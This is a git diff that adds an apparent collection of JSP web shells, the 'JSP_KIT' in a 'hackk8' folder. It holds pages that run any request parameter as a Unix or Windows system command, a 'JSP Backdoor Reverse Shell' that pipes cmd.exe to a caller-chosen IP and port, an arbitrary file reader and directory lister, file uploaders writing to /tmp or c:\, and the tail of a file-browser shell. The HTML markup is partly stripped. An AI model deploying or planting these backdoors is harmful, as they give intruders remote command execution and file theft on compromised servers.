+				out.println("
    ");
+			}
+            if (request.getAttribute("dir") != null){
+%>
+	
    
+	
+<%
+			// Output the table, starting with the headers.
+			String dir = URLEncoder.encode("" + request.getAttribute("dir"));
+			String cmd = browser_name + "?dir=" + dir;
+			int sortMode = 1;
+			if (request.getParameter("sort") != null) sortMode = Integer.parseInt(request
+					.getParameter("sort"));
+			int[] sort = new int[] {1, 2, 3, 4};
+			for (int i = 0; i < sort.length; i++)
+				if (sort[i] == sortMode) sort[i] = -sort[i];
+			out.println(""
+					+ ""
+					+ ""
+					+ ""
+					+ "");
+			char trenner = File.separatorChar;
+			// Output the Root-Dirs, without FORBIDDEN_DRIVES
+			File[] entry = File.listRoots();
+			for (int i = 0; i < entry.length; i++) {
+				boolean forbidden = false;
+				for (int i2 = 0; i2 < FORBIDDEN_DRIVES.length; i2++) {
+					if (entry[i].getAbsolutePath().toLowerCase().equals(FORBIDDEN_DRIVES[i2])) forbidden = true;
+				}
+				if (!forbidden) {
+					out.println("");
+					out.println("");
+				}
+			}
+			// Output the parent directory link ".."
+			if (f.getParent() != null) {
+				out.println("");
+				out.println("");
+			}
+			// Output all files and dirs and calculate the number of files and total size
+			entry = f.listFiles();
+			if (entry == null) entry = new File[] {};
+			long totalSize = 0; // The total size of the files in the current directory
+			long fileCount = 0; // The count of files in the current working directory
+			if (entry != null && entry.length > 0) {
+				Arrays.sort(entry, new FileComp(sortMode));
+				for (int i = 0; i < entry.length; i++) {
+					String name = URLEncoder.encode(entry[i].getAbsolutePath());
+					String type = "File"; // This String will tell the extension of the file
+					if (entry[i].isDirectory()) type = "DIR"; // It's a DIR
+					else {
+						String tempName = entry[i].getName().replace(' ', '_');
+						if (tempName.lastIndexOf('.') != -1) type = tempName.substring(
+								tempName.lastIndexOf('.')).toLowerCase();
+					}
+					String ahref = "";
+					String link = buf; // The standard view link, uses Mime-type
+					if (entry[i].isDirectory()) {
+						if (entry[i].canRead() && USE_DIR_PREVIEW) {
+							//Show the first DIR_PREVIEW_NUMBER directory entries in a tooltip
+							File[] fs = entry[i].listFiles();
+							if (fs == null) fs = new File[] {};
+							Arrays.sort(fs, new FileComp());
+							StringBuffer filenames = new StringBuffer();
+							for (int i2 = 0; (i2 < fs.length) && (i2 < 10); i2++) {
+								String fname = conv2Html(fs[i2].getName());
+								if (fs[i2].isDirectory()) filenames.append("[" + fname + "];");
+								else filenames.append(fname + ";");
+							}
+							if (fs.length > DIR_PREVIEW_NUMBER) filenames.append("...");
+							else if (filenames.length() > 0) filenames
+									.setLength(filenames.length() - 1);
+							link = ahref + "dir=" + name + "\" title=\"" + filenames + "\">"
+									+ FOL_IMG + "[" + buf + "]";
+						}
+						else if (entry[i].canRead()) {
+							link = ahref + "dir=" + name + "\">" + FOL_IMG + "[" + buf + "]";
+						}
+						else link = FOL_IMG + "[" + buf + "]";
+					}
+					else if (entry[i].isFile()) { //Entry is file
+						totalSize = totalSize + entry[i].length();
+						fileCount = fileCount + 1;
+						if (entry[i].canRead()) {
+							dlink = ahref + "downfile=" + name + "\">Download";
+							//If you click at the filename
+							if (USE_POPUP) link = ahref + "file=" + name + "\" target=\"_blank\">"
+									+ buf + "";
+							else link = ahref + "file=" + name + "\">" + buf + "";
+							if (entry[i].canWrite()) { // The file can be edited
+								//If it is a zip or jar File you can unpack it
+								if (isPacked(name, true)) elink = ahref + "unpackfile=" + name
+										+ "\">Unpack";
+								else elink = ahref + "editfile=" + name + "\">Edit";
+							}
+							else { // If the file cannot be edited
+								//If it is a zip or jar File you can unpack it
+								if (isPacked(name, true)) elink = ahref + "unpackfile=" + name
+										+ "\">Unpack";
+								else elink = ahref + "editfile=" + name + "\">View";
+							}
+						}
+						else {
+							link = buf;
+						}
+					}
+					String date = dateFormat.format(new Date(entry[i].lastModified()));
+					out.println("");
+					if (entry[i].canRead()) {
+						out
+								.println("");
+					}
+					else {
+						out
+								.println("");
+					}
+					out.print("");
+					if (entry[i].isDirectory()) out.print("");
+					else {
+						out.print("");
+					}
+					out.println(""); // The edit link (or view, depending)
+				}
+			}%>
+	
     NameSizeTypeDate  
     ");
+					String name = URLEncoder.encode(entry[i].getAbsolutePath());
+					String buf = entry[i].getAbsolutePath();
+					out.println("  [" + buf + "]");
+					out
+							.println("     
    ");
+				out.println("  " + FOL_IMG + "[..]");
+				out
+						.println("     
      " + link + " "
+								+ convertFileSize(entry[i].length()) + "" + type + "  " + // The file type (extension)
+							date + "" + // The date the file was created
+							dlink + "" + // The download link
+							elink + "
    
+	Select all
+	
    
+		
+		<%=convertFileSize(totalSize)%> in <%=fileCount%> files in <%= dir2linkdir((String) request.getAttribute("dir"), browser_name, sortMode)%>
+		
+	
    
+	
    
+		">
+		
+		
+		
+	
    
+	
    
+		
+		
+		
+		
+		
+		
+	
    
+	
    
+	
    
+		">
+		
+		
+		
+	
    
+	<% if (NATIVE_COMMANDS){%>
+    
    
+		">
+		
+		
+		
+	
    <%
+    }
+    }%>
+	
    
+	
    
+		jsp File Browser version <%= VERSION_NR%> by www.vonloesch.de
+	
    
+
+<%
+    }
+%>
\ No newline at end of file
diff --git a/jsp/hackk8/jsp2/cmd.jsp b/jsp/hackk8/jsp2/cmd.jsp
new file mode 100644
index 0000000..6357276
--- /dev/null
+++ b/jsp/hackk8/jsp2/cmd.jsp
@@ -0,0 +1,35 @@
+<%@ page import="java.util.*,java.io.*"%>
+<%
+//
+// JSP_KIT
+//
+// cmd.jsp = Command Execution (unix)
+//
+// by: Unknown
+// modified: 27/06/2003
+//
+%>
+
+
    
+
+
+
    
+
    +<%
+if (request.getParameter("cmd") != null) {
+        out.println("Command: " + request.getParameter("cmd") + "
    ");
+        Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
+        OutputStream os = p.getOutputStream();
+        InputStream in = p.getInputStream();
+        DataInputStream dis = new DataInputStream(in);
+        String disr = dis.readLine();
+        while ( disr != null ) {
+                out.println(disr); 
+                disr = dis.readLine(); 
+                }
+        }
+%>
+
    
+
+
+
diff --git a/jsp/hackk8/jsp2/cmdjsp.jsp b/jsp/hackk8/jsp2/cmdjsp.jsp
new file mode 100644
index 0000000..63625af
--- /dev/null
+++ b/jsp/hackk8/jsp2/cmdjsp.jsp
@@ -0,0 +1,32 @@
+// note that linux = cmd and windows = "cmd.exe /c + cmd" 
+
+
    
+
+
+
    
+
+<%@ page import="java.io.*" %>
+<%
+   String cmd = request.getParameter("cmd");
+   String output = "";
+
+   if(cmd != null) {
+      String s = null;
+      try {
+         Process p = Runtime.getRuntime().exec("cmd.exe /C " + cmd);
+         BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream()));
+         while((s = sI.readLine()) != null) {
+            output += s;
+         }
+      }
+      catch(IOException e) {
+         e.printStackTrace();
+      }
+   }
+%>
+
+
    +<%=output %>
+
    
+
+
diff --git a/jsp/hackk8/jsp2/jsp-reverse.jsp b/jsp/hackk8/jsp2/jsp-reverse.jsp
new file mode 100644
index 0000000..ae9a781
--- /dev/null
+++ b/jsp/hackk8/jsp2/jsp-reverse.jsp
@@ -0,0 +1,91 @@
+// backdoor.jsp
+// http://www.security.org.sg/code/jspreverse.html
+
+<%@
+page import="java.lang.*, java.util.*, java.io.*, java.net.*"
+% >
+<%!
+static class StreamConnector extends Thread
+{
+        InputStream is;
+        OutputStream os;
+
+        StreamConnector(InputStream is, OutputStream os)
+        {
+                this.is = is;
+                this.os = os;
+        }
+
+        public void run()
+        {
+                BufferedReader isr = null;
+                BufferedWriter osw = null;
+
+                try
+                {
+                        isr = new BufferedReader(new InputStreamReader(is));
+                        osw = new BufferedWriter(new OutputStreamWriter(os));
+
+                        char buffer[] = new char[8192];
+                        int lenRead;
+
+                        while( (lenRead = isr.read(buffer, 0, buffer.length)) > 0)
+                        {
+                                osw.write(buffer, 0, lenRead);
+                                osw.flush();
+                        }
+                }
+                catch (Exception ioe)
+
+                try
+                {
+                        if(isr != null) isr.close();
+                        if(osw != null) osw.close();
+                }
+                catch (Exception ioe)
+        }
+}
+%>
+
+
    JSP Backdoor Reverse Shell
    
+
+
    
+IP Address
+
+Port
+
+
+
    
+
    
+
    
+
+<%
+String ipAddress = request.getParameter("ipaddress");
+String ipPort = request.getParameter("port");
+
+if(ipAddress != null && ipPort != null)
+{
+        Socket sock = null;
+        try
+        {
+                sock = new Socket(ipAddress, (new Integer(ipPort)).intValue());
+
+                Runtime rt = Runtime.getRuntime();
+                Process proc = rt.exec("cmd.exe");
+
+                StreamConnector outputConnector =
+                        new StreamConnector(proc.getInputStream(),
+                                          sock.getOutputStream());
+
+                StreamConnector inputConnector =
+                        new StreamConnector(sock.getInputStream(),
+                                          proc.getOutputStream());
+
+                outputConnector.start();
+                inputConnector.start();
+        }
+        catch(Exception e) 
+}
+%>
+
+
diff --git a/jsp/hackk8/jsp2/list.jsp b/jsp/hackk8/jsp2/list.jsp
new file mode 100644
index 0000000..eb0db3a
--- /dev/null
+++ b/jsp/hackk8/jsp2/list.jsp
@@ -0,0 +1,77 @@
+<%@ page import="java.util.*,java.io.*"%>
+<%
+//
+// JSP_KIT
+//
+// list.jsp = Directory & File View
+//
+// by: Sierra
+// modified: 27/06/2003
+//
+%>
+<%
+if(request.getParameter("file")==null) {
+	%>
+	
+	
    
+	
+	
+	
    
+	<%
+	}
+%>
+<% //read the file name.
+try { 
+File f = new File(request.getParameter("file"));
+if(f.isDirectory()) {
+	int i;
+	String fname = new String("Unknown");
+	String fcolor = new String("Black");
+	%>
+	
+	
+	<%
+	out.print("Path: " + f.toString() + "
     
    ");
+	File flist[] = f.listFiles();
+	for(i=0; i" + fname.toString() + " " + "( Size: " + flist[i].length() + " bytes)
    \n");
+		}
+	%>
+	    
+	<%
+
+	} else {
+	if(f.canRead() == true) {
+		InputStream in = new FileInputStream(f);
+		ServletOutputStream outs = response.getOutputStream();
+		int left = 0;
+			try {
+			while((left) >= 0 ) {
+				left = in.read(); 
+				outs.write(left);
+				}
+			} catch(IOException ex) {ex.printStackTrace();}
+		outs.flush();
+		outs.close();
+		in.close();	
+		} else {
+		out.print("Can't Read file
    ");
+		}
+	}
+} catch(Exception ex) {ex.printStackTrace();}
+%>
\ No newline at end of file
diff --git a/jsp/hackk8/jsp2/up.jsp b/jsp/hackk8/jsp2/up.jsp
new file mode 100644
index 0000000..5df5d0d
--- /dev/null
+++ b/jsp/hackk8/jsp2/up.jsp
@@ -0,0 +1,162 @@
+
+<%@ page import="java.io.*,java.util.*,javax.servlet.*" %>
+<%
+//
+// JSP_KIT
+//
+// up.jsp = File Upload (unix)
+//
+// by: Unknown
+// modified: 27/06/2003
+//
+%>
+
+
    
+
+
+
    
+
+<%!
+public String getBoundary(HttpServletRequest request,Properties prop) throws ServletException,IOException{
+	String boundary = null;
+	Enumeration enum = request.getHeaderNames();
+	while(enum.hasMoreElements()){
+		String header = (String)enum.nextElement();
+		String hvalue = request.getHeader(header);
+		prop.setProperty((header).toLowerCase(),hvalue);
+		if("content-type".equalsIgnoreCase(header) ){
+			int idx = hvalue.lastIndexOf("boundary=");
+			if(idx != -1 ){
+				boundary= hvalue.substring(idx+9 , hvalue.length());
+			}
+		}
+	}
+	return boundary;
+	
+}
+public String getFileName(String secondline){
+	int len = secondline.length();
+	int idx = secondline.lastIndexOf("filename=");
+	if(idx == -1 ) return null;
+	String filename = secondline.substring(idx+10 , len-1);
+	filename = filename.replace('\\','/');
+	idx = filename.lastIndexOf("/");
+	idx = idx + 1;
+	filename = filename.substring( idx );
+	return filename;        
+}
+%>
+<%
+String DPATH = "/tmp/";
+int ROUGHSIZE = 640000; // BUG: Corta el fichero si es mayor de 640Ks
+int MAXSIZE = 10; // 10 Mega Byte
+String boundary = getBoundary(request,prop);
+if(boundary == null ){
+	boundary = prop.getProperty("boundary"); 
+	}else{
+	boundary = "--"+boundary;
+	}
+if(boundary == null ){
+	return;
+	}
+Long contentsize = new Long(prop.getProperty("content-length","0"));
+int c;
+StringWriter st = new StringWriter();
+if(contentsize.longValue() < 1L ){
+	return;
+	} 
+long l = contentsize.longValue() - ROUGHSIZE; 
+int KB = 1024;
+int MB = 1024 * KB;
+int csize = (int)(l / MB);
+if(csize > MAXSIZE ){
+	return;
+	}
+ServletInputStream fin =  request.getInputStream();
+int cn;
+int count=0;
+while((c=fin.read()) != -1 ){
+	if( c == '\r') break;
+	st.write(c);
+	count++;
+	}
+c=fin.read();
+String tboundary = st.getBuffer().toString();
+tboundary=tboundary.trim();
+if(! tboundary.equalsIgnoreCase( boundary) ){
+	return;
+	}
+st.close();
+st = null;
+st = new StringWriter();
+while((c=fin.read()) != -1 ){
+	if( c == '\r' ) break;
+	st.write(c);
+	}
+c=fin.read();
+String secondline = st.getBuffer().toString();
+String filename  =  getFileName(secondline);
+st.close();
+st = null;
+st = new StringWriter();
+while((c=fin.read()) != -1 ){
+	if( c == '\r' ) break;
+	st.write( c );
+	}
+c=fin.read();
+
+fin.read(); 
+fin.read();  
+File newfile = null;
+FileOutputStream fout =null; 
+try{
+	if(filename == null) throw new FileNotFoundException("File Name not found");
+	newfile = new File(DPATH+filename); 
+	fout = new FileOutputStream( newfile );
+	}catch(FileNotFoundException fnexp){
+	fin.close();
+	return;
+	}
+
+byte b[] = null;
+while(l > 1024L){
+	b = new byte[1024];
+	fin.read(b,0,1024);
+	fout.write(b);
+	b=null;
+	l -= 1024L;
+	}
+if(l > 0){
+	b = new byte[(int)l];
+	fin.read(b,0,(int)l);
+	fout.write(b);
+	}
+
+
+ByteArrayOutputStream baos = new ByteArrayOutputStream();
+while((c = fin.read()) != -1){
+	baos.write(c);
+	}
+String laststring = baos.toString();
+int idx = laststring.indexOf(boundary);
+b = baos.toByteArray();
+if(idx > 2){
+	fout.write(b,0,idx-2);
+	}else{
+	fout.close();
+	newfile.delete();
+	return;
+	}
+fout.flush();
+fout.close();
+fin.close();
+
+out.println("FileName: " + newfile.getName());
+out.println("FileSize: " + newfile.length());
+
+%>
+
+
+
+        
+
diff --git a/jsp/hackk8/jsp2/win32/cmd_win32.jsp b/jsp/hackk8/jsp2/win32/cmd_win32.jsp
new file mode 100644
index 0000000..21f2bdc
--- /dev/null
+++ b/jsp/hackk8/jsp2/win32/cmd_win32.jsp
@@ -0,0 +1,31 @@
+<%@ page import="java.util.*,java.io.*,java.net.*"%>
+<%
+//
+// JSP_KIT
+//
+// cmd.jsp = Command Execution (win32)
+//
+// by: Unknown
+// modified: 27/06/2003
+//
+%>
+
+
    
+
+
+
    
+
    +<%
+if (request.getParameter("cmd") != null) {
+        out.println("Command: " + request.getParameter("cmd") + "\n
    ");
+        Process p = Runtime.getRuntime().exec("cmd.exe /c " + request.getParameter("cmd"));
+        OutputStream os = p.getOutputStream();
+        InputStream in = p.getInputStream();
+        DataInputStream dis = new DataInputStream(in);
+        String disr = dis.readLine();
+        while ( disr != null ) {
+                out.println(disr); disr = dis.readLine(); }
+        }
+%>
+
    
+
\ No newline at end of file
diff --git a/jsp/hackk8/jsp2/win32/up_win32.jsp b/jsp/hackk8/jsp2/win32/up_win32.jsp
new file mode 100644
index 0000000..ff977ac
--- /dev/null
+++ b/jsp/hackk8/jsp2/win32/up_win32.jsp
@@ -0,0 +1,162 @@
+
+<%@ page import="java.io.*,java.util.*,javax.servlet.*" %>
+<%
+//
+// JSP_KIT
+//
+// up.jsp = File Upload (win32)
+//
+// by: Unknown
+// modified: 27/06/2003
+//
+%>
+
+
    
+
+
+
    
+
+<%!
+public String getBoundary(HttpServletRequest request,Properties prop) throws ServletException,IOException{
+	String boundary = null;
+	Enumeration enum = request.getHeaderNames();
+	while(enum.hasMoreElements()){
+		String header = (String)enum.nextElement();
+		String hvalue = request.getHeader(header);
+		prop.setProperty((header).toLowerCase(),hvalue);
+		if("content-type".equalsIgnoreCase(header) ){
+			int idx = hvalue.lastIndexOf("boundary=");
+			if(idx != -1 ){
+				boundary= hvalue.substring(idx+9 , hvalue.length());
+			}
+		}
+	}
+	return boundary;
+	
+}
+public String getFileName(String secondline){
+	int len = secondline.length();
+	int idx = secondline.lastIndexOf("filename=");
+	if(idx == -1 ) return null;
+	String filename = secondline.substring(idx+10 , len-1);
+	filename = filename.replace('\\','/');
+	idx = filename.lastIndexOf("/");
+	idx = idx + 1;
+	filename = filename.substring( idx );
+	return filename;        
+}
+%>
+<%
+String DPATH = "c:\\";
+int ROUGHSIZE = 640000; // BUG: Corta el fichero si es mayor de 640Ks
+int MAXSIZE = 10; // 10 Mega Byte
+String boundary = getBoundary(request,prop);
+if(boundary == null ){
+	boundary = prop.getProperty("boundary"); 
+	}else{
+	boundary = "--"+boundary;
+	}
+if(boundary == null ){
+	return;
+	}
+Long contentsize = new Long(prop.getProperty("content-length","0"));
+int c;
+StringWriter st = new StringWriter();
+if(contentsize.longValue() < 1L ){
+	return;
+	} 
+long l = contentsize.longValue() - ROUGHSIZE; 
+int KB = 1024;
+int MB = 1024 * KB;
+int csize = (int)(l / MB);
+if(csize > MAXSIZE ){
+	return;
+	}
+ServletInputStream fin =  request.getInputStream();
+int cn;
+int count=0;
+while((c=fin.read()) != -1 ){
+	if( c == '\r') break;
+	st.write(c);
+	count++;
+	}
+c=fin.read();
+String tboundary = st.getBuffer().toString();
+tboundary=tboundary.trim();
+if(! tboundary.equalsIgnoreCase( boundary) ){
+	return;
+	}
+st.close();
+st = null;
+st = new StringWriter();
+while((c=fin.read()) != -1 ){
+	if( c == '\r' ) break;
+	st.write(c);
+	}
+c=fin.read();
+String secondline = st.getBuffer().toString();
+String filename  =  getFileName(secondline);
+st.close();
+st = null;
+st = new StringWriter();
+while((c=fin.read()) != -1 ){
+	if( c == '\r' ) break;
+	st.write( c );
+	}
+c=fin.read();
+
+fin.read(); 
+fin.read();  
+File newfile = null;
+FileOutputStream fout =null; 
+try{
+	if(filename == null) throw new FileNotFoundException("File Name not found");
+	newfile = new File(DPATH+filename); 
+	fout = new FileOutputStream( newfile );
+	}catch(FileNotFoundException fnexp){
+	fin.close();
+	return;
+	}
+
+byte b[] = null;
+while(l > 1024L){
+	b = new byte[1024];
+	fin.read(b,0,1024);
+	fout.write(b);
+	b=null;
+	l -= 1024L;
+	}
+if(l > 0){
+	b = new byte[(int)l];
+	fin.read(b,0,(int)l);
+	fout.write(b);
+	}
+
+
+ByteArrayOutputStream baos = new ByteArrayOutputStream();
+while((c = fin.read()) != -1){
+	baos.write(c);
+	}
+String laststring = baos.toString();
+int idx = laststring.indexOf(boundary);
+b = baos.toByteArray();
+if(idx > 2){
+	fout.write(b,0,idx-2);
+	}else{
+	fout.close();
+	newfile.delete();
+	return;
+	}
+fout.flush();
+fout.close();
+fin.close();
+
+out.println("FileName: " + newfile.getName());
+out.println("FileSize: " + newfile.length());
+
+%>
+
+
+
+        
+